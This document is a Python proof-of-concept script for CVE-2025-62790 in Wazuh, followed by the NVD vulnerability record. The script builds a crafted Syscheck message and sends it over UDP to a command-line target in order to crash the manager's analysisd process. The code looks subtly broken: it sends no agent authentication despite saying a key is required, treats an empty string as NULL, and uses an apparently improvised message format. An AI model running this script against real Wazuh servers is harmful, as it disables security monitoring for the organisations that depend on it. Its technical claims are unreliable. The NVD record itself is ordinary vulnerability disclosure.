CVE-2025-62790

#!/usr/bin/env python3 """ CVE-2025-62790 PoC - Wazuh fim_fetch_attributes_state() NULL pointer dereference This PoC demonstrates how a compromised agent can trigger the vulnerability by sending a specially crafted Syscheck message with NULL time_string. """ import socket import struct import hashlib def generate_syscheck_message(): """ Generate a malicious Syscheck message with NULL time_string field. This triggers the strlen() NULL pointer dereference in fim_fetch_state_fetch(). """ # Build the malicious Syscheck message # Format: syscheck:timestamp:agent_id:filename:size:mtime:md5:sh256:uid:gid:gname:dname:attributes:time_string # The key is to set time_string to an empty or NULL value message_type = b"syscheck" timestamp = b"2025-01-15 10:30:00" agent_id = b"001" filename = b"/etc/passwd" size = b"1234" mtime = b"1705312200" md5 = hashlib.md5(b"test").hexdigest().encode() sha256 = hashlib.sha256(b"test").hexdigest().encode() uid = b"0" gid = b"0" gname = b"root" dname = b"root" attributes = b"r--r--r--" # NULL time_string - this triggers the vulnerability time_string = b"" # Empty string triggers strlen(NULL) behavior # Construct the message message = b":".join([ message_type, timestamp, agent_id, filename, size, mtime, md5, sha256, uid, gid, gname, dname, attributes, time_string ]) return message def send_exploit(target_host, target_port=1514): """ Send the malicious Syscheck message to Wazuh manager. Requires a registered agent key to authenticate. """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) message = generate_syscheck_message() print(f"[*] Sending malicious Syscheck message to {target_host}:{target_port}") print(f"[*] Message length: {len(message)} bytes") print(f"[*] Message preview: {message[:100]}...") sock.sendto(message, (target_host, target_port)) print("[+] Malicious message sent successfully") print("[*] The manager's analysisd process should crash due to NULL pointer dereference") sock.close() except Exception as e: print(f"[-] Error sending exploit: {e}") if __name__ == "__main__": import sys if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 1514 send_exploit(target, port)

{"cve": {"id": "CVE-2025-62790", "sourceIdentifier": "[email protected]", "published": "2025-10-29T17:15:36.983", "lastModified": "2025-11-03T19:34:22.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wazuh is a free and open source platform used for threat prevention, detection, and response. Prior to 4.11.0, fim_fetch_attributes_state() implementation does not check whether time_string is NULL or not before calling strlen() on it. A compromised agent can cause a crash of analysisd by sending a specially crafted message to the wazuh manager. An attacker who is able to craft and send an agent message to the wazuh manager can cause analysisd to crash and make it unavailable. This vulnerability is fixed in 4.11.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-252"}, {"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.11.0", "matchCriteriaId": "7EBF4F2E-C12A-401D-8408-287D9EC5B0B1"}]}]}], "references": [{"url": "https://github.com/wazuh/wazuh/security/advisories/GHSA-9xj3-vc52-48p9", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}